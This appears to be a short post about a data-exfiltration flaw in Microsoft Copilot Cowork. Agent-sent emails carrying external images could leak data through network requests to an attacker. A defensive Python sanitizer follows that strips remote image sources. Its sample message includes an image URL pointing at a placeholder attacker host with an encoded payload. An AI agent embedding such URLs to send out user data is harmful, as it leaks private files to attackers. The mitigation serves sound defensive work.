Microsoft Copilot Cowork Exfiltrates Files
The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data. In this case Microsoft Copilot Cowork (yes, that's ) was allowing agents to send emails to the user's own inbox without approval... but those messages were then rendered in a way that could leak data to an attacker via rendered images: Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a ...
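The rendering-side mitigation this implies, as an added example rather than code from Microsoft or the original write-up: before an agent-authored message is rendered, drop every `<img>` src or srcset that would make the client fetch from a host outside an allow list, so whatever was smuggled into a URL never leaves the client. The host names and the query-string payload in the sample are constructed placeholders, not values from the reported incident.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

class ExternalImageStripper(HTMLParser):
    """Drops <img> src/srcset values that would trigger a fetch from a non-allow-listed host."""
    def __init__(self, allowed_hosts):
        super().__init__(convert_charrefs=False)
        self.allowed = {h.lower() for h in allowed_hosts}
        self.out, self.blocked = [], []
    def _remote(self, url):
        parts = urlsplit(url.strip())
        if parts.scheme in ("cid", "data"):
            return False  # embedded content, no request leaves the client
        return parts.netloc.lower() not in self.allowed
    def _clean(self, tag, attrs):
        if tag != "img":
            return attrs
        kept = []
        for name, value in attrs:
            urls = []
            if value and name == "src":
                urls = [value]
            elif value and name == "srcset":
                urls = [c.split()[0] for c in value.split(",") if c.strip()]
            if any(self._remote(u) for u in urls):
                self.blocked.append(value)  # attribute dropped: nothing is fetched
            else:
                kept.append((name, value))
        return kept
    def handle_starttag(self, tag, attrs):
        parts = [tag] + [n if v is None else f'{n}="{v.replace(chr(34), "&quot;")}"'
                         for n, v in self._clean(tag, attrs)]
        self.out.append("<" + " ".join(parts) + ">")
    handle_startendtag = handle_starttag  # <img .../> needs no closing tag
    def handle_endtag(self, tag): self.out.append(f"</{tag}>")
    def handle_data(self, data): self.out.append(data)
    def handle_entityref(self, name): self.out.append(f"&{name};")
    def handle_charref(self, name): self.out.append(f"&#{name};")

def neutralize_external_images(html, allowed_hosts=()):
    """Return (sanitized_html, blocked_urls) for one agent-authored message."""
    p = ExternalImageStripper(allowed_hosts)
    p.feed(html); p.close()
    return "".join(p.out), p.blocked

# Constructed sample (placeholder host and payload): the first <img> would leak its query string.
SAMPLE_MESSAGE = ('<p>Summary of your files</p>'
                  '<img src="https://attacker.example/p.png?d=c2VjcmV0" alt="">'
                  '<img src="cid:inline-logo" alt="logo">'
                  '<img src="https://cdn.example.com/ok.png">')
```

The returned blocked list is also what you would log or alert on, since a message that carries any remote image reference at all is the signal that an agent tried to phone out.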